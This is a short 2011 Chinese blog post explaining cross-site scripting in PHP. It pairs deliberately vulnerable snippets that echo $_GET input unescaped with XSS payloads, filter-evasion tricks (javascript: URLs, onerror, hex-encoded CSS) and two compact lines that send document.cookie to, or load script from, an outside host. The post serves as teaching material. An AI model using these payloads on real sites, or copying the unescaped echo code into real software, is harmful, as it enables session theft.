PHP安全新闻早8点_1112

// 2011-11-12 星期六 
// 程序员的思维:   
// index.php ---代码片段 
<?php 
$Micropoor = $_GET['Micropoor']; 
print $Micropoor; 
?> 
//我们的思维: 
index.php?Micropoor=<script>alert(document.cookie)</script> 
 
############################################################ 
// 程序员的思维:   
// index.php ---代码片段 
<html> 
<body> 
//...略 
<input name="Micropoor" value="<?php echo $_GET['Micropoor']; ?>" > 
//...略 
</body> 
</html> 
//我们的思维: 
[url]http://127.0.0.1:81/index.php?Micropoor=[/url]"><script>alert(document.cookie);</script> 
############################################################### 
// 程序员的思维: 
程序员过滤了<script></script>标签,那么在页面上就不会执行这段js代码 
 
//我们的思维: 
<img src='http://hi.baidu.com/micropoor/Micropoor.jpg'>img的src标签是指向一个web服务器的图片URL 
但是也可以替换为:<img src='javascript:alert("Micropoor")'> 
其他:进制转换,加入混淆字符,加密等。 
 
############################################################# 
//突破长短: 

下面的 28 字节命令将把用户的cookie传送至主机名为micropoor:的服务器。 
open("//micropoor/"+document.cookie)   
如果直接注入 HTML 
么下面这个30字节的标签将从主机名为micropoor:的服务器加载并执行一段脚本。 
 
<script src=http://micropoor></script>  

知识拓展:
1,直接使用JS脚本。
<img src="javascript:alert('Micropoor')" />
2,对JS脚本进行转码。
<img src="javascript:alert('Micropoor')" />
3,利用标签的触发条件插入代码并进行转码。
<img onerror="alert('Micropoor')" />
4,使用16进制来写
<img STYLE="background-image: \75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
两种类型
存储型XSS
反射型XSS
新闻就是新闻,不做深究。功底也无法深究。

结论:一切的输入都是有害的。

posted @ 2011-11-13 21:56  noevil  阅读(489)  评论(0编辑  收藏  举报